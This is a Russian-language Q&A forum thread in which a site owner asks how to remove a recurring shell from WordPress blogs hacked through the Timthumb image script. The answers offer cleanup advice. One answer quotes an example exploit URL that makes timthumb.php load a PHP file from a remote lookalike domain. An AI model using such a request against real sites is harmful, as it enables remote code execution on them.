Задать вопрос
mihavxc
@mihavxc

Wordpress и уязвимость в Timthumb?

Добрый день, помогите вычистить шелл с Wordpress.


Есть свой сервер с десятком сайтов и двумя никому ненужными блогами на Wodrpress(3.5.1). На них по сути никто кроме поисковиков и не заходит. На обоих блогах были установлены темы от Woothemes.com и пяток плагинов. Все, кроме тем старался регулярно обновлять. Однажды заметил, что через скрипт cache.php на этих блогах размещают страницы со ссылками на другие сайты.


Погуглив понял, что проблема в уязвимости скрипта Timthumb, который использовался в темах. Обновил фреймворки тем, в настройках тем отключил использование этого скрипта и удалил сами скрипты во всех директориях. Поставил плагин Timthumb Scanner, который ищет скрипты Timthumb, обновляет их и сообщает, если они уже взломаны.


В итоге сейчас наблюдаю следующую картинку — после удаления скриптов спустя пару часов скрипт cache.php появляется снова в /wp-content/uploads/2012/12, причем версии 2.8.10(последняя 2.8.11). Если обновляю скрипт, то спустя пару часов версия будет снова 2.8.10. Если не обновлять, то через какое-то время плагин скажет, что скрипт был взломан.


Пробовал отключать полностью все плагины — тот же результат. Смотрел логи — никаких странных запросов. Если переименовать файл index.php в корне, то ломать перестают. Дописывал в index.php логгер всех POST запросов — ничего странного. Никак не пойму как именно меня ломают, весь очевидно, что это происходит на автомате. В логах ssh/ftp тоже ничего подозрительного. Может кто уже сталкивался с подобным?
  • Вопрос задан
  • 6684 просмотра
Подписаться 2 Оценить Комментировать
Пригласить эксперта
Ответы на вопрос 4
POS_troi
@POS_troi
СадоМазо Админ, флудер, троль.
Ищите шелл.
Сравните все файлы движка с оригиналами.

Этого никто не делает руками, всё на автомате. Если на индексе 404 то «взлом не производится» — про переименнованый index.php
Ответ написан
Комментировать
POS_troi
@POS_troi
СадоМазо Админ, флудер, троль.
Также не факт что взлом производится непосредственно через движок wordpress, тут можно на соседей грешить. Хот всё зависит от настроек сервера.
Ответ написан
stan_jeremy
@stan_jeremy
не понял зачем вы внедряли логгер пост запросов? бага же в гете

/wp-content/themes/pbv_multi/scripts/timthumb.php?src=http://picasa.com.xpl.be/yahoo.php
Ответ написан
Bo0oM
@Bo0oM
Ai bolit?
revisium.com/ai/
Ответ написан
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Похожие вопросы